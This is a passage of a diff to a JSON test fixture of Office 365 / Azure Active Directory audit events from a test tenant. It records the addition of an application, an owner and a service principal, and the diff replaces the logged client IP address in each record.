Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\"
:[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -16928,9 +16928,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:36:30", "ExtendedProperties": [ { 
@@ -17148,7 +17148,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"targetPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"Application.ObjectID\\\",\\\"Application.DisplayName\\\",\\\"Application.AppId\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"33cdc459-1335-4d6c-b773-f5eef4df7793\\\",\\\"DisplayName\\\":\\\"siem2
\\\",\\\"ObjectClass\\\":\\\"Application\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.7383513Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554439\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ccbe264f-f6bc-42bd-b5b6-2893ce2f465f\",\"ModifiedProperties\":[{\"Name\":\"Application.ObjectID\",\"NewValue\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"OldValue\":\"\"},{\"Name\":\"Application.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"Application.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"asr@testsiem.onmicrosoft.com\",\"Operation\":\"Add owner to 
application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},
{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"targetPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"Application.ObjectID\\\",\\\"Application.DisplayName\\\",\\\"Application.AppId\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"33cdc459-1335-4d6c-b773-f5eef4df7793\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"Application\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.7383513Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554439\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{
\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ccbe264f-f6bc-42bd-b5b6-2893ce2f465f\",\"ModifiedProperties\":[{\"Name\":\"Application.ObjectID\",\"NewValue\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"OldValue\":\"\"},{\"Name\":\"Application.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"Application.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"asr@testsiem.onmicrosoft.com\",\"Operation\":\"Add owner to application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2},{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -17178,9 +17178,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-11T16:36:30", "ExtendedProperties": [ { 
@@ -17400,7 +17400,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"M
ozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": 
\\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) 
Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n 
}\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -17430,9 